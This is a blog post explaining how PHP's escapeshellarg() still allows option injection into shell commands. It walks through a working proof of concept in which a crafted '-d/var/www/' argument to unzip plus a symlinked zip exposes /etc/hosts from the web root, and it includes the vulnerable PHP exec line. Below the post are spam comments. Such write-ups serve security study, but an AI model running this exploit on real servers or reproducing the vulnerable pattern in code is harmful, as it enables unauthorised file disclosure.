воскресенье, 24 марта 2013 г.

Breaking escapeshellarg() news

PHP function escapeshellarg() is the most popular way to prevent OS Commanding threats during shell calls by escaping command arguments.

But this function is not a panacea, and you should keep this in mind when using it.

Let's try to understand what this escaping function is doing:
  1. Performs framing quotes string: aaa -> 'aaa'
  2. Cuts bytes 0x00, 0x80-0xFF
  3. Escape single quotes: ' -> ''\'''
This guaranteed to create one console line argument from a string.
So, looks like ideal solution, right?

But there are no restrictions on characters in this line argument. For example, command line argument after escapeshellarg() filtration can be a command key (-a, -o and others). This is the first trick.

Second trick is argument parser which embeded in command line utilities.

Feel it:
$command -arg param
$command -arg=param
$command '-arg=param'
$command '-arg param'

There are no differences between these four examples for most command line utilities! Pay your attention to two last command lines, - you can put these lines after escapeshellarg() filtration.

   exec('unzip -j '.escapeshellarg($_GET['zip_arch_name']).' *.dat -d /tmp');
Is it code protected from hackers? Try to check this in terminal by typing:
$ unzip -j '-d/var/www/' *.dat -d /tmp

This command will extract files with masks '*.dat' (all matches after first), '-d', '/tmp' from ZIP arhieve with filename *.dat to output folder /var/www.

Preparing exploit:
$ ln -s /etc/hosts 2.dat
$ zip --symlinks 1.zip 2.dat
$ mv 1.zip 1.dat

You can also add file with name '-d' to archive to make attack more stable (w/o needs of upload 1.dat and 2.dat both for exploit).

Try it:

$ unzip -j '-d/var/www' *.dat -d /tmp
Archive:  1.dat
    linking: /var/www/2.dat  -> /etc/hosts
finishing deferred symbolic links:
  /var/www/2.dat -> /etc/hosts
caution: filename not matched:  -d
caution: filename not matched:  /tmp

Now you can read files by +FollowSymlinks              -------------->

7 комментариев:

  1. A little bit more clearer please?
    so you can inject '-d/var/www/' which will be treated as an argument and create an archive in /var/www....what's the deal with the symlinks?

    1. Mmm... Can't understand your question...
      "Now you can read files by +FollowSymlinks "

  2. In the event that you auto needs repairs and you just don't have the money to cover it, you might need to look for a payday credit to get your auto up and running.
    Payday Loans San-diego

  3. Possibly the truck blows a tire or has carburetor inconvenience. Whatever the issue, it prompts a budgetary catastrophe, as bills heap up and the influenced individual can't pay.
    Cash Advance

  4. Just on the off chance that you acquire through payday advances, ensure that you pay on time with the goal that you won't have issues later on, particularly that concerning your credit records.
    Cash Advance

  5. Subsequent to deciding whether you are qualified or not, you can act properly so you would now be able to back your money issue. Simply be constant in your hunt and you can locate the correct payday credit on the web.
    Car Title Loans

  6. This is very nice blog.Thanks to shear it.You can also visit my site pest control centennial .We will help you to protect your family.